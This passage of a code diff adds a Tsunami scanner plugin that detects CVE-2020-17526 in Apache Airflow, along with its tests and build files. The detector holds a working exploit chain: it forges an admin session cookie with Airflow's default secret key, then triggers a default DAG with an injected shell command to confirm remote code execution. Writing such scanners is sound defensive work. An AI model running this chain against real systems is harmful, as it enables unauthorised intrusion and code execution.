ImmutableList matchedServices) { + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + var payload = getTsunamiCallbackHttpPayload(); + if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log( + "Tsunami callback server is not setup for this environment, cannot run CVE-2020-17526" + + " Detector."); + return false; + } + + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + try { + // 1. sending the first request to retrieve a valid CSRF token and a valid cookie + Map results = getFreshCsrfTokenAndSessionCookie(networkService); + if (results == null) { + return false; + } + String freshSessionCookieValue = results.get("freshSessionCookieValue"); + String freshCsrfToken = results.get("freshCsrfToken"); + + // 2. enabling the vulnerable DAG + this.httpClient.send( + HttpRequest.post( + rootUrl + "admin/airflow/paused?is_paused=true&dag_id=example_trigger_target_dag") + .setHeaders( + HttpHeaders.builder() + .addHeader("Cookie", String.format("session=%s", freshSessionCookieValue)) + .addHeader("X-CSRFToken", freshCsrfToken) + .build()) + .build(), + networkService); + + // 3. sending the RCE payload + results = getFreshCsrfTokenAndSessionCookie(networkService); + if (results == null) { + return false; + } + + freshSessionCookieValue = results.get("freshSessionCookieValue"); + freshCsrfToken = results.get("freshCsrfToken"); + + String urlEncodedBody = + "csrf_token=CSRFTOKEN&dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag&conf=%7B%22message%22%3A%22%60PAYLOAD%60%22%7D" + .replace("CSRFTOKEN", freshCsrfToken); + urlEncodedBody = + urlEncodedBody.replace("PAYLOAD", URLEncoder.encode(payload.getPayload(), UTF_8)); + + this.httpClient.send( + HttpRequest.post( + rootUrl + + "admin/airflow/trigger?dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag") + .setHeaders( + HttpHeaders.builder() + .addHeader("Cookie", String.format("session=%s", freshSessionCookieValue)) + .addHeader("X-CSRFToken", freshCsrfToken) + .addHeader("Content-Type", "application/x-www-form-urlencoded") + .build()) + .setRequestBody(ByteString.copyFromUtf8(urlEncodedBody)) + .build(), + networkService); + + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration)); + + return payload.checkIfExecuted(); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } + + private Map getFreshCsrfTokenAndSessionCookie(NetworkService networkService) + throws IOException { + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + Map results = new HashMap<>(); + + FlaskSessionSigner newToken = + new FlaskSessionSigner( + "{\"_fresh\":true,\"user_id\":1,\"_permanent\":true}", + "Zzx63w", + "temporary_key", + "cookie-session"); + + HttpResponse firstResponse = + this.httpClient.send( + HttpRequest.get(rootUrl + "admin/") + .setHeaders( + HttpHeaders.builder() + .addHeader("Cookie", String.format("session=%s", newToken.dumps())) + .build()) + .build(), + networkService); + if (!(firstResponse.headers().get("Set-Cookie").isPresent() + && firstResponse.bodyString().isPresent() + && firstResponse.bodyString().get().contains("Airflow - DAGs"))) { + return null; + } + List parsedCookies = + HttpCookie.parse(firstResponse.headers().get("Set-Cookie").get()); + String freshSessionCookieValue = null; + for (HttpCookie cookie : parsedCookies) { + if (cookie.getName().equals("session")) { + freshSessionCookieValue = cookie.getValue(); + } + } + if (freshSessionCookieValue == null) { + return null; + } + results.put("freshSessionCookieValue", freshSessionCookieValue); + + Matcher m = CSRF_PATTERN.matcher(firstResponse.bodyString().get()); + if (!m.find()) { + return null; + } + String freshCsrfToken = m.group(1); + results.put("freshCsrfToken", freshCsrfToken); + return results; + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build()); + } catch (NotImplementedException n) { + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2020-17526")) + .setSeverity(Severity.CRITICAL) + .setTitle( + "CVE-2020-17526 Authentication bypass lead to Arbitrary Code Execution in" + + " Apache Airflow prior to 1.10.14") + .setDescription( + "An attacker can bypass the authentication and then use a default DAG to" + + " execute arbitrary code on the server hosting the apache airflow" + + " application.") + .setRecommendation( + "update to version 1.10.14. Also, you can change the default value for the" + + " '[webserver] secret_key' config to a securely generated random value to" + + " sign the cookies with a non-default secret key.")) + .build(); + } +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorConfigs.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorConfigs.java new file mode 100644 index 000000000..ec57cf8c5 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorConfigs.java @@ -0,0 +1,23 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.cve202017526; + +import com.google.tsunami.common.config.annotations.ConfigProperties; + +@ConfigProperties("plugins.community.detectors.apache_airflow_cve_2020_17526") +final class Cve202017526DetectorConfigs { + int oobSleepDuration; +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorModule.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorModule.java new file mode 100644 index 000000000..46019e832 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorModule.java @@ -0,0 +1,37 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.cve202017526; + +import com.google.inject.Provides; +import com.google.tsunami.plugin.PluginBootstrapModule; +import com.google.tsunami.plugins.cve202017526.Annotations.OobSleepDuration; + +/** A module registering the detector for CVE-2020-17526. */ +public final class Cve202017526DetectorModule extends PluginBootstrapModule { + @Override + protected void configurePlugin() { + registerPlugin(Cve202017526Detector.class); + } + + @Provides + @OobSleepDuration + int provideOobSleepDuration(Cve202017526DetectorConfigs configs) { + if (configs.oobSleepDuration == 0) { + return 20; + } + return configs.oobSleepDuration; + } +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/FlaskSessionSigner.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/FlaskSessionSigner.java new file mode 100644 index 000000000..5ff2c349d --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/FlaskSessionSigner.java @@ -0,0 +1,24 @@ +package com.google.tsunami.plugins.cve202017526.flasksessionsigner; + +import java.util.Base64; + +public class FlaskSessionSigner { + public final String timestamp; + public String payload; + public byte[] separator; + public TokenSigner signer; + + public FlaskSessionSigner(String payload, String timestamp, String secret, String salt) { + this.separator = new byte[] {(byte) '.'}; + this.payload = payload; + this.timestamp = timestamp; + this.signer = new TokenSigner(secret.getBytes(), salt.getBytes(), this.separator); + } + + public String dumps() { + byte[] header = Base64.getUrlEncoder().withoutPadding().encode(payload.getBytes()); + String message = + String.format("%s%s%s", new String(header), new String(this.separator), this.timestamp); + return new String(signer.sign(message.getBytes())); + } +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/TokenSigner.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/TokenSigner.java new file mode 100644 index 000000000..4b4891888 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/flasksessionsigner/TokenSigner.java @@ -0,0 +1,60 @@ +package com.google.tsunami.plugins.cve202017526.flasksessionsigner; + +import com.google.common.primitives.Bytes; +import java.security.InvalidKeyException; +import java.security.NoSuchAlgorithmException; +import java.util.Base64; +import javax.crypto.Mac; +import javax.crypto.spec.SecretKeySpec; + +public class TokenSigner implements Cloneable { + public String digestMethod; + public byte[] secret_key; + public byte[] salt; + public byte[] sep; + + public TokenSigner(byte[] secret_key, byte[] salt, byte[] sep) { + this.digestMethod = "HmacSHA1"; + this.secret_key = secret_key; + this.salt = salt; + this.sep = sep; + } + + public byte[] derive_key() throws Exception { + try { + SecretKeySpec signingKey = new SecretKeySpec(secret_key, digestMethod); + Mac mac = Mac.getInstance(digestMethod); + mac.init(signingKey); + return mac.doFinal(salt); + } catch (NoSuchAlgorithmException e) { + throw new Exception("No such derivation algorithm"); + } catch (InvalidKeyException e) { + throw new Exception("Invalid derivation key"); + } + } + + public byte[] get_signature(byte[] value) { + try { + byte[] key = derive_key(); + SecretKeySpec signingKey = new SecretKeySpec(key, digestMethod); + Mac mac = Mac.getInstance(digestMethod); + mac.init(signingKey); + byte[] sig = mac.doFinal(value); + return Base64.getUrlEncoder().withoutPadding().encode(sig); + } catch (Exception e) { + return new byte[] {}; + } + } + + public byte[] sign(byte[] value) { + return Bytes.concat(value, sep, get_signature(value)); + } + + public TokenSigner clone() { + try { + return (TokenSigner) super.clone(); + } catch (CloneNotSupportedException e) { + throw new AssertionError(); + } + } +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/test/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorTest.java b/community/detectors/apache_airflow_cve_2020_17526/src/test/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorTest.java new file mode 100644 index 000000000..f526424fa --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/test/java/com/google/tsunami/plugins/cve202017526/Cve202017526DetectorTest.java @@ -0,0 +1,242 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.cve202017526; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.inject.testing.fieldbinder.Bind; +import com.google.inject.testing.fieldbinder.BoundFieldModule; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.plugins.cve202017526.Annotations.OobSleepDuration; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Objects; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for the {@link Cve202017526Detector}. */ +@RunWith(JUnit4.class) +public final class Cve202017526DetectorTest { + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Bind(lazy = true) + @OobSleepDuration + private int sleepDuration = 1; + + @Inject private Cve202017526Detector detector; + + private void createInjector() { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + Modules.override(new Cve202017526DetectorModule()).with(BoundFieldModule.of(this))) + .injectMembers(this); + } + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + } + + @After + public void tearDown() throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_withCallbackServer_onVulnerableTarget_returnsVulnerability() + throws IOException { + startMockWebServer(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + assertThat(detectionReports.getDetectionReportsList()) + .comparingExpectedFieldsOnly() + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2020-17526")) + .setSeverity(Severity.CRITICAL) + .setTitle( + "CVE-2020-17526 Authentication bypass lead to Arbitrary Code Execution" + + " in Apache Airflow prior to 1.10.14") + .setDescription( + "An attacker can bypass the authentication and then use a default DAG" + + " to execute arbitrary code on the server hosting the apache" + + " airflow application.") + .setRecommendation( + "update to version 1.10.14. Also, you can change the default value for" + + " the '[webserver] secret_key' config to a securely generated" + + " random value to sign the cookies with a non-default secret" + + " key.")) + .build()); + } + + @Test + public void detect_withCallbackServer_butNoCallback_returnsEmpty() throws IOException { + startMockWebServer(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + @Test + public void detect_withoutCallbackServer_returnsEmpty() throws IOException { + mockTargetService.start(); + mockTargetService.url("/"); + + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + mockTargetService.enqueue(new MockResponse().setResponseCode(500)); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + createInjector(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private void startMockWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + + @Override + public MockResponse dispatch(RecordedRequest request) { + switch (request.getPath()) { + // fall through + case "/admin/": + return new MockResponse() + .setResponseCode(200) + .addHeader("Set-Cookie: session=aaaaaa") + .setBody("Airflow - DAGs \n var CSRF = \"bbbbbb\""); + case "/admin/airflow/paused?is_paused=true&dag_id=example_trigger_target_dag": + if (Objects.requireNonNull(request.getHeaders().get("X-CSRFToken")).equals("bbbbbb") + && Objects.requireNonNull(request.getHeaders().get("Cookie")) + .equals("session=aaaaaa")) { + return new MockResponse().setResponseCode(200); + } + // fall through + case "/admin/airflow/trigger?dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag": + if (Objects.requireNonNull(request.getHeaders().get("X-CSRFToken")).equals("bbbbbb") + && Objects.requireNonNull(request.getHeaders().get("Cookie")) + .equals("session=aaaaaa") + && request + .getBody() + .toString() + .contains("dag_id=example_trigger_target_dag&origin=")) { + return new MockResponse().setResponseCode(200); + } + // fall through + default: + return new MockResponse().setResponseCode(400); + } + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + } +} diff --git a/community/detectors/apache_airflow_exposed_ui/README.md b/community/detectors/apache_airflow_exposed_ui/README.md new file mode 100644 index 000000000..c35bc5c63 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/README.md @@ -0,0 +1,16 @@ +# Exposed Apache Airflow Detector + +This plugin for Tsunami detects publicly exposed apache airflow instances. First +it tries to receive a callback to the tsunami callback server and if it failed, +it sends an HTTP request to an API endpoint to match the response with a +pattern. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_airflow_exposed_ui/build.gradle b/community/detectors/apache_airflow_exposed_ui/build.gradle new file mode 100644 index 000000000..e414d3371 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/build.gradle @@ -0,0 +1,70 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami detector for exposed apache airflow server.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + guiceVersion = '4.2.3' + jsoupVersion = '1.9.2' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation "org.jsoup:jsoup:${jsoupVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.inject:guice:${guiceVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} diff --git a/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..2c3521197 Binary files /dev/null and b/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/apache_airflow_exposed_ui/gradlew b/community/detectors/apache_airflow_exposed_ui/gradlew new file mode 100755 index 000000000..f5feea6d6 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/gradlew @@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git 